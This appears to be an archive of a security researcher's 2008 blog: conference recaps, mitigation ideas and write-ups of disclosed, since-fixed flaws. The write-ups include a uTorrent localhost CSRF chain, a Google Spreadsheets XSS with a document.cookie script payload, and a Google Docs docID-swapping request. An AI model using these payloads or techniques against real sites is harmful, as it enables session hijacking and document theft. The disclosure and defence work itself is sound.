The conference was VERY academic… which I love.  Academics present with an eye to the future so I listened as PHD candidates talked about securing nano networks, sensor based wifi networks and a slew of other topics… Academics also seem to have an boldness and fearless approach to the topics they present, which I admire…


 


While I enjoyed most of the talks I attended, there was one that perked the ears of the blackhat in me.  John Crain of ICANN gave a talk on “Securing the Internet Infrastructure: Myths and Truths”.  If you don’t know, ICANN basically owns the root DNS servers that the world relies on everyday.  He gave a great explanation of how ICANN goes about creating a heterogeneous ecosystem of DNS servers.  These DNS servers use multiple versions and types of DNS software, multiple versions and types of operating systems, and  even go so far as to use various pieces of hardware and processors.  The reasoning behind this logic is… if a vulnerability is discovered in a particular piece of software (or hardware) is discovered, it would only affect a small part of the entire root DNS ecosystem, whose load could be transferred to another.  It’s an interesting approach indeed.  After the talk, someone asked me why enterprises/corporations don’t adopt a similar strategy.  I thought about it some and I don’t think this approach could enterprise environment… here’s why (other than the obvious costs and ungodly administration requirements):


 


ICANNs interest is primarily based on preventing hackers from modifying a 45k text file (yes the root for the Internet is a ~45k text file).  Now, if a hacker happens to break into a root DNS server and modifies the file, ICANN can disable the hacked system, restore the file and go about their business.  As long as ICANN has a “good” system up somewhere, they can push all their traffic to that system.  Businesses on the other hand, aren’t not primarily interested in preventing the modification of data (not yet at least), they are more interested in preventing the pilfering of data.  So if you own a network of a million different configurations, a vulnerability in any one of those configurations could allow an attacker to steal your data.  Once the hacker has stolen your data, what does it matter that the 999,999 other systems are unhacked?  



This brings up the heart of the argument, should we be worried about our systems being compromised or should we be worried about our data being stolen?  These are actually two different problems as I don’t necessarily have to compromise your system to steal your data…



Sunday, April 20, 2008

CSRF pwns your box?!?!

Before going talking about an interesting set of CSRF vulnerabilities that were released this weekend, I did want to take a few moments to do some "housekeeping" on the recent spreadsheets.google.com XSS.  (1) I gave the Google Security Team the details for this particular issue well before talking about it on my blog.  (2) The described issue was fixed by the GST before I even considered publically speaking about the vuln.  (3)  Part of the vulnerability involved a caching flaw in Google's servers, this issue is specific to Google and it was also fixed...   OK, on to the good stuff...
         
         
A few weeks ago, Rob Carter told me about a few interesting CSRF vulnerabilities that he discovered in a uTorrent plugin (he publicly disclosed them this weekend).  Rob was able to chain together the CSRF vulnerabilities and the net result is complete compromise of the victim’s machine!  I think this may be the first PURE CSRF vulnerability that I've seen that resulted in compromise of a victims machine (there is an argument amongst some of my colleagues as to whether protocol handling/URI vulnerabilities are actually a form of CSRF, but that’s another story).  The series of vulnerabilities basically follow this flow:
         
When a user installs the uTorrent Web UI plugin. the plugin essentially starts a locally running web server on your machine (in order to serve the Web UI).  Rob targets the CSRF vulnerabilities associated with this locally running web server.

  • Rob uses a first CSRF to turn on the "Move completed downloads" option on the uTorrent Web UI.  The CSRF looks something like this:
    http://localhost:14774/gui/?action=setsetting&s=dir_completed_download_flag&v=1


         

         
         

                   

Once the file is placed, the next time the user restarts their machine, the attacker controlled file will be run...  there you have it... compromise of a victim’s system through three CSRFs!  Scary stuff... you can read more about the issue on Robs Blog <robs blog>.

ToorCon ROCKED!

ToorCon this weekend totally ROCKED.  Any venue that has flaming tetherball, major websites getting pwnd, hawt hacker chics pwning backbone protocols, java 0-days, and free beer has to ROCK.  All the talks I caught were awesome and the con has inspired me to look into some new avenues of research (aka pwnage). 

      

Thanks to H1kari, tim, Geo, and Phil for having me out!

Tuesday, April 15, 2008

Mark Dowd scares me....

If you haven't heard yet, Mark Dowd chopped up a Flash vulnerability ninja style and released a 25 page whitepaper describing his attack.  It's truly a work of art and can be found here. <pdf>

    

I'm not even going to attempt to describe any portion of this attack (just thinking about it makes my head hurt), but Thomas Ptacek from Matasano has a great writeup <writeup>

Sunday, April 13, 2008

Google XSS

Now, normally when I find an XSS vulnerability on a popular domain I just report it to the appropriate security team and move on, but this one is interesting…



By taking advantage of the content-type returned by spreadsheets.google.com (and a caching flaw on the part of Google), I was able to pull off a full blown XSS against the google.com domain. For those of you who don’t understand what this means, allow me to elaborate. When Google sets their cookie, it is valid for all of their sub domains. So, when you log into gmail (mail.google.com), your gmail cookie is actually valid for code.google.com, docs.google.com, spreadsheets.google.com…and so on. If someone (like me) finds an XSS vulnerability in any one of these sub domains, I’ll be able to hijack your session and access any google service as if I were you.



So, in this instance, I have an XSS on spreadsheets.google.com. With this single XSS, I can read your Gmail, backdoor your source code (code.google.com), steal all your Google Docs, and basically do whatever I want on Google as if I were you! Google’s use of “document.domain=” also make things a little easier to jump from one domain to the next, but that’s another story…



This particular XSS takes advantage of how Internet Explorer determines the content type of the HTTP response being returned by the server. Most would think that explicitly setting the content-type to something that isn’t supposed to be rendered by the browser would easily solve this issue, but it does not. IE isn’t the only browser that will ignore the content-type header in certain circumstances, Firefox, Opera, and Safari will ignore the content-type header as well (in certain circumstances). Security professionals and more importantly developers need to understand the nuances of how the popular web browsers handle various content-type headers, otherwise they may put their web application at risk of XSS. The most comprehensive paper I’ve seen on the subject was written by Blake Frantz of Leviathan. The paper can be found here. It’s a “MUST HAVE” reference for web app security pros. Read it, understand it, protect yourself appropriately or expect others to exploit appropriately…



In this issue, Google set the content-type header for a response which I controlled the content to text/plain. If I can inject what looks like HTML into the first few bytes of the response, I’ll be able to “trick” Internet Explorer into rendering the content as HTML. Luckily for me, I was able to do just that.



I created a spreadsheet on spreadsheets.google.com and for the first cell (A1) I put the following content: “<HTML><body><script>alert(document.cookie)</script></body></HTML>”







I then saved the spreadsheet and generated a link for the spreadsheet to be served as a CSV.



CSV



When this option is selected, the contents of the spreadsheet are displayed inline (the content-disposition header was not explicitly set to “attachment”), IE ignores the content-type header, sniffs the content-type from the response, then proceeds to render the response as if it were HTML. At this point, I control the entire HTML being rendered under an xxx.google.com domain.



XSS



To be fair, Google included a subtle defense to protect against content-type sniffing (padding the response), but those protection measures failed (with a little prodding by me). The issue is fixed, but if you try to reproduce this issue, you’ll see their defense in play. It a solid defense which shows they understand the nuances of content-type sniffing.



I’ll provide some tips on taking ownership of untrusted content and serving it from your server in a later post, but for now take a look at the paper written by Blake Frantz. I’m sure it will open some eyes…

RSA over... on to toorcon Seattle

McAfee Party    RSA is officially over!  It was a great experience and I'll talk about a few of the talks that really captured me in later posts.  I do want to thank Jeremiah Grossman for throwing the WASC get together, the BAYSEC crew, McAfee (their party was awesome),  iSEC (their party was AWESOME), Thirsty Bear, everyone at the W, and everyone that came to the Breaking and Securing Web Applications talk! 

      

There were tons of people trying to get some answers to their web appsec questions after the talk, if you weren't able to talk to me after the session or during the conference, please don't hesitate to shoot me an email. 

I'll be at toorcon next week, if you're in the Seattle area, look me up...

Thursday, April 3, 2008

Insecure Content Ownership

Taking ownership of someone else’s content is always a tricky deal.  Nate McFeters and I spoke about some of the issues related to taking “ownership” of someone else’s content last year at Defcon, but we continue to see more and more places willingly accepting third party content and happily serving it from their domain.  I came across an interesting cross domain issue based on content ownership that involved Google.  Google has fixed the issue, but I thought the issue was interesting so I’ll share the details… but before I do… I wanted to mention the efforts put forth by the Google Security Team (GST).  Fixing this issue was not trivial… it involved significant changes as to how content was served from Google servers.  Needless to say, the GST moved quickly and the issue was fixed in an amazingly expedient and effective manner… KUDOS to the GST!

    

On to the issue:
I discovered that users could upload arbitrary files to the code.google.com domain by attaching a file to the "issues" portion of a project.  The uploaded file is then served from the code.google.com domain.  Normally, these types of attacks would make use of the Flash cross domain policy file and the System.security.loadPolicyFile() API, however due to the unique path of each project, the cross domain capabilities of Flash are very limited in this instance as policy files loaded via loadPolicyFile() are “limited to locations at or below its own level in the server's hierarchy”. 

    

Address Bar

     
Flash isn't the only option here though.  Java has a different security policy and uploading a Java class file to the code.google.com domain gives me access to the entire domain, as opposed to only certain folders and sub folders. 

    

Sounds pretty straight forward huh?  Well, I ran into some issues as the JVM encodes certain characters in its requests for class files made via the CODE attribute within APPLET tags.  After poking around a bit, I realized that requests made via the ARCHIVE would be sent as is, without the encoding of special characters.  With this newfound knowledge in hand, I created a JAR file with my class file within it and uploaded it to code.google.com.

      

Issues Upload

    

Now, the CODE attribute is a required attribute within the APPLET tag, so I specified name of the class file I placed within the JAR file.  When the APPLET tag is rendered, the JVM first downloads the JAR file specified in the ARCHIVE attribute, the JVM then makes the request for the class file specified in the CODE attribute.  In this instance, the request for the class file specified in the CODE attribute will fail as the class file is not on the code.google.com server (even if it was, we wouldn’t be able to reach it as requests made via the CODE attribute are encoded).  The failure to locate the class file causes the JVM to begin searching alternate locations for the requested class file and the JVM will eventually load a class file with the same name located inside of the JAR file...

    

Applet Code  



    

Once the class file is loaded, the JVM will fire the init() method and Java's Same Origin policy allows me to use the applet to communicate with the domain that served the applet class file (as opposed to the domain that hosts the HTML calling the APPLET tag).  Here’s a screenshot of the PoC page I was hosting on XS-Sniper.com. 

     

Proof of Concept

    
I don’t think there is a tool on the market today that even attempts to detect something like this and I’ve met many “security professionals” that have no idea that vulnerabilities like this even exist.  This isn’t the first time I’ve come across a cross domain hole based on content ownership.  I’m expecting we’ll see a lot more of these types of vulnerabilities in the future as cross domain capabilities becomes more prevalent in client side technologies and as content providers become more and more comfortable in taking ownership of others content.

Wednesday, April 2, 2008

Amsterdam, RSA, Security Vids, and the Harvard Business Review

I've survived yet another Blackhat Europe... actually, part of me probably perished in the streets of Amsterdam, but that's a story for the bars.  I'll be in San Francisco next week speaking at the RSA Conference.  I plan on attending the WASC RSA meetup and the iSEC Forum and Social (I love the iSEC parties!).  If you see me out and about, hit me up and we'll talk security over a few drinks!

    

Also, I was sent a link to a collection of secure development videos from a co-worker.  The videos cover a wide range of topics such as "How do I: Prevent a SQL Injection Security Flaw in an ASP.NET Application" all the way to "How Do I:  Use Managed Cards in Windows CardSpace to Increase the Security of My Web Site".  The videos are a great place for any budding developer to explore some Secure Development techniques.  I like the videos because many of them address security related questions that I get all of the time and serve as an excellent remediation tool.  The vids are by no means a comprehensive guide to Secure Development nor are they a replacement for a formal SDL, but they can be a great training tool and have a lot of value. 

       

Last item for the day...  I'm a big fan of the Harvard Business Review (HBR).  Usually, the articles contained within HBR have nothing to do with information security (or even computers for that matter).  In the latest issue, there is a piece entitled "Radically Simple IT", which outlines some interesting strategies for IT projects at the enterprise level (path based approach).  It's an interesting article and if you're considering implementing any medium to large size IT project, you should definitely give it a read....

Wednesday, March 26, 2008

Have some Bad Sushi at Blackhat Europe

I'll be headed out to Blackhat Europe, speaking on phishing, scams, and ATM skimmers. If you're in the area, look me up and well grab a few at the bar.



Also, I wanted to take a moment to thank my colleagues out in Hyderabad, India. I recently traveled to Hyderabad for some security work and the hospitality and friendliness I encountered really made me feel at home!

Wednesday, March 19, 2008

Preventing XSS Exploitation with CSRF Tokens?!?!

A colleague and I were tossing around the idea of preventing XSS Exploitation with CSRF tokens. Now, before people start going "high and right" on me...hear me out... I DID NOT say "prevent XSS" with CSRF tokens, I said prevent "XSS Exploitation" with CSRF tokens. This discussion arose after someone presented me with the following scenario (this same scenario has been presented to me many, many times... typically at a bar after a few drinks):



You come into an organization and take over the application security department because the old security person left/was fired/was arrested/whatever. You take a look at the 10 million line flagship application and realize that its riddled with XSS holes, yet you don't have the resources/time/cojo's to fix all the exposures. What do you do?


This scenario is usually followed up by a pitch to sell me on some Web Application Firewall product..... I'll put my thoughts on WAFs aside for a second... and I'll try to get to the underlying issue of the scenario presented above: You need to do something to stop your customers from getting XSSd, you don't have much time, you don't have many resources and there is a ton of code to go through.

Now, what if you required CSRF tokens/canaries for every request? This doesn't "fix" the XSS exposures, but it makes it a LOT more difficult to exploit (unless you want to exploit yourself). The CSRF tokens effectively prevent an attacker from sending the XSS to anyone else. Considering many token/canary values are implemented at the framework level, in most cases it would require a configuration change for the application. Now, once every page is protected by the canary, you can systematically examine the "high priority" pages or pages where canaries don't make sense and remove the canary requirement after that particular page/functionality has gone through a review. In order to prevent the attacker from sending their own canary value, the CSRF token would have to be tied to the current users session (most good implementations do this anyway).

Now, once again, this DOES NOT FIX XSS, it just makes exploitation harder. This isn't a new concept, in fact this same type of approach is being used by modern day operating systems. Take buffer overflows for example, protections like DEP, ASLR, Stackguard, GS flag... these protections do not prevent developers from writing buffer overflows and they do not "fix" buffer overflows... they do make exploiting buffer overflows a lot more difficult (unless you're a Litchfield brother, HD Moore, or Alexander Sotirov).

Now, of course there are some cons to this strategy... First, the XSS exposures are not fixed (the WAFs don't fix them either). This doesn't protect against persistent XSS. There will be some performance hits to your web server when you have canaries for each request. This will NOT help you defend against injection attacks like SQL Injection or Command injection, that will require an audit... on the flip side... if you're relying solely on a WAF to protect you against SQLi and Command Injection, I'd be worried...

Monday, March 17, 2008

Reflections on Trusting Trust

For those who have never read the classic "Reflections on Trusting Trust", you can find it here.  Reflections is a easy read on the perils of running un-trusted code on your machine.  It's a concept that's foreign to many users as we typically run "un-trusted" HTML and clientside scripts from web sites thousands of times a day, praying that he browser sandbox and same origin policy saves us...  I mean.. can you really trust the underlying content from this blog?

   

Of course, downloading and running code on you machine is EVEN MORE DANGEROUS.  It doesn't matter what kind of browser protections you have, once you execute code from an untrusted source, you're at the mercy of that developer.  Do you really trust the publishers of all those plugins and add-ons you are running?  A perfect example of this... is G-Archiver.  G-Archiver is a program that can be used to backup your Gmail messages to an offline source.  Apparently, after some tinkering with DotNet Reflector (great tool btw), Dustin Brooks discovered a HARD CODED Gmail username and password in the source.  Upon further investigation, Dustin realized that users of G-Archiver were silently getting their Gmail Creds posted to a Gmail account belonging to the creator of the G-Archive tool (John Terry).  Here's a screen shot of what Dustin saw:

   

gmail-password-thief-screenshot1.png



     

Luckly, I've been conditioned (mostly by the pranksters at the Advanced Security Center in Houston) not to trust anything...

   

Links and Links

Wednesday, March 5, 2008

IE 8 Beta is Out!

The IE8 Beta is out.  You can grab beta 1 here.  I'm not going to comment on my thoughts on IE8 as I'm biased, but I've been playing around with some of the features and it's actually pretty cool.  

    

Probably one of the most interesting/most talked about features is the webslices and activities.  It's a little difficult to explain, but I think the video here does a pretty good job.

    

Happy Hunting!

Sunday, February 24, 2008

Hanging with the Feds in DC

Blackhat Federal in Washington DC is officially over!  It was a great time and I'm honored to have been chosen to speak at the event.  Nitesh and I received a lot of great feedback and our talk was mentioned in a few different places (here, here and here).  Nitesh and I realize that the slides by themselves are virtually impossible to understand, so if you're interested in hearing the full talk, please don't hesitate to contact us.


The talks I attended were all great, but there below is a quick blurb on my favorites:




Cracking GSM - I've been waiting months for this talk.  h1kari and Steve from THC gave an incredible overview of how they are able to crack the A5 encryption used by cell phones to protect GSM voice and SMS communications.  They also pointed out several security weaknesses associated with cell phones and cell phone transmissions (strongest signal seeking, JVMs on SIM cards, downgrade attacks, lack of notification when weak/no encryption is being used...).  h1kari and Steve are using FPGAs to generate a 2 TERABYTE rainbow table and use FGPAs to crack the encrypted data.  With the help of a SINGLE FPGA (and the rainbow table) you can crack encrypted GSM communications in about 30 mins (30 mins as in, you capture and store the traffic as is goes by and crack it offline in 30 mins).  Commercial grade equipment that is being developed will be able to do it in 30 seconds!  This the third FPGA based project that has raised my eyebrows over the last year (this, NSA@home, and a third project that will remain undisclosed at this time), expect to see high amounts of processing power used to crack/brute force/solve previously un-crackable/ un-bruteforceable/ and unsolvable problems...  we live in exciting times my friends.




IO in the Cyber Domain, Immunity Style - Sinan from Immunity gave an awesome talk on Information Operations (IO) and how IO differs from penetration testing.  This is a discussion that I've had with many colleagues over many beers.  The basic gist of the discussion is, "how do you defend an organization/individual against sustained targeted attacks over an extended period of time?"  Immunity was basically given unlimited time and budget to break into an organization... it's a scenario very closely aligned with state sponsored Computer Network Exploitation (CNE), Computer Network Attack (CNA) and Computer Network Defense (CND) scenarios, where the adversary can conduct sustained information gathering and targeted attacks against an organization over an extended period of time.  Immunity spiced it up by bringing into play a "few 0-Dayz" and described how they penetrated the organizations defenses in a methodical, well-planned, and well-organized manner.  IO is a topic that's near and dear to my heart and I thought the scenarios presented in the talk were indicative of what some organizations face everyday...


 URI Use and Abuse / Dtrace: the REs Unexpected Swiss Army Knife  - I put these two talks together because Nate, Rob, Tiller, and David really brought out one of the core reasons why I like security conferences... we met the day before the conference at the hotel bar, talked about a few interesting things, and then proceeded to take a vulnerability from "un-exploitable" (as reported to us by the vendor) to "exploitable".  Not to worry, the vendor has already been notified about the vulnerability...

Sunday, January 27, 2008

Bad Sushi: Beating Phishers at their own Game

A colleague (Nitesh Dhanjani) and I were recently accepted to speak at Black Hat Federal in Washington DC.  What basically started as a few laughs over a phishing site, eventually turned into months of serious investigation into the entire ecosystem that supports the phishing effort. 

   
Nitesh and I basically infiltrated a few phishing forums, tracking a phisher from compromised webservers, to phishing forums, to carderz sites.  We managed to get a hold of about 100 different phishing kits, various tools used by phishers, and gained some insight as to how phishers do their business.  I was STAGGERED by the amount of PII (full names, DOBs, credit card numbers, SSNs, addresses, phone numbers…) that is placed on public web servers by phishers, hidden only by obscurity.  Once this obscurity is broken, even a simple query in a search engine will reveal a significant amount of stolen identity related information including names, credit card numbers, SSN, DOBs…

   
I was also FLOORED by the number of phishing and credit card fraud related forums.

     

carderz.jpg

   

Nitesh and I basically stopped our research because the number of sites and the staggering amount of exposed PII was simply too much.  There literally is an entire ecosystem devoted to supporting the phishing effort that plagues modern day financial institutions, one that simply cannot be viewed by two Security Researchers alone.  If you’re in the DC area, stop by for Black Hat and we’ll show you some of the things we saw.  We give a brief description of some of the things we saw during an interview for Help Net Security.  For those of you who are curious, due to the ENORMOUS amount of PII we came across, we’ve contacted the FBI and we’ll be sharing some things with them that WILL NOT be in the talk or any interviews!

Monday, January 7, 2008

There's an OAK TREE in my blog!?!?!

A while back I came across another interesting issue that allowed me to steal an arbitrary Google Doc (assuming I knew the DocID). This issue has already been fixed by Google, but the details are pretty interesting so I thought I would share! Now, before I get into the gory details, I'd like to mention two things about Google:

     


  1. I know some people have had issues with Google's Security Team (GST), but I've always had pleasant experiences with them. GST moves with LIGHTING speed and they are usually great about keeping in me apprised of the status of various issues I've reported to them.
  2.  


  3. In addition to fixing this particular exposure, GST has also increased the entropy of the DocID making sploits based on DocID guessing totally impractical. It's a great example of going the extra step to help protect users...

 


Now... the gory details... First, I went to Wordpress.com and created a new blog (there were other ways to pull this off, but this was the easiest way). Once the blog was created, I logged into Google Docs with my account, created a document and selected the "publish this document" option. Once in the "publish" menu, I selected the "Blog Site Settings" option. This option basically allows a Google Docs user to create a document in Google Docs and POST it directly to thier blog! I entered my blog provider, blog username, and blog password into the blog settings page. The page is shown below:

 



My Blog Settings

 



Once my blog settings were properly entered, I selected the "Publish This Document To Your Blog" option. The POST request made by my browser looked something like this:

 


POST /MiscCommands HTTP/1.1
<HTTP HEADERS>

command=cmdvalue&localDate=datevalue&docID=doc-id-here&finis=finisvalue&POST_TOKEN=posttokenvalue

 


When this feature is selected, it appears that the Google Docs server makes a request to the xmlrpc.php file on the blog server (Wordpress.com), passing the credentials I gave in the blog settings. When the blog server indicates that the blog creds were valid, the Google Docs server sends the contents of the Google Doc to the blog server. hmmmm... that docID value looks reeeallly interesting... I changed the docID in the POST request from the docID of my newly created document to the docID of the "Article For Oak Tree View" (the document used by Google to Demo Google Docs).

 



OAKTREE-DocID

 



After changing the docID and sending the POST request, I logged into my Wordpress Blog and LO AND BEHOLD... my first blog POST was the Oak Tree Newsletter!

 



Oak Tree in My Blog

 



I tried it on some friends documents with the same result and then contacted the GST....

 



Links to other Google Docs Stuff here, here, and here

Wednesday, January 2, 2008

Straight from the Source!

I hope everyone had a great New Year!  I had a sweet New Year… Liddell laid a serious smack down, I spent a few days boarding the slopes of Mt Baker, and I came across a sweet new blog from Secure Windows Initiative (SWI) at Microsoft.
   
Damian Hasse, Jonathan Ness, and Greg Wroblewski from SWI are going to give a technical analysis of vulnerabilities being fixed by the patches released on “patch Tuesday”.  Taking a look at the analysis and the level of detail they go into and I must say… I’m impressed.  One of the examples discussed by the guys from SWI (MS07-63) shows the differences between pre-patch and post-patch SMB packets and even includes a pcap file of pre-patch SMB packets.

I think initiatives like this are awesome.  Bad guys are going to figure this stuff out via reverse engineering, why not help the good guys understand what they are patching as well.  Providing technical information about vulnerabilities can help a good security team better understand and mitigate the business risks associated with vulnerabilities.  I can even see some resourceful professor using the analysis provided by SWI as case studies for prospective security pros.  Check it out sometime!  Great job guys!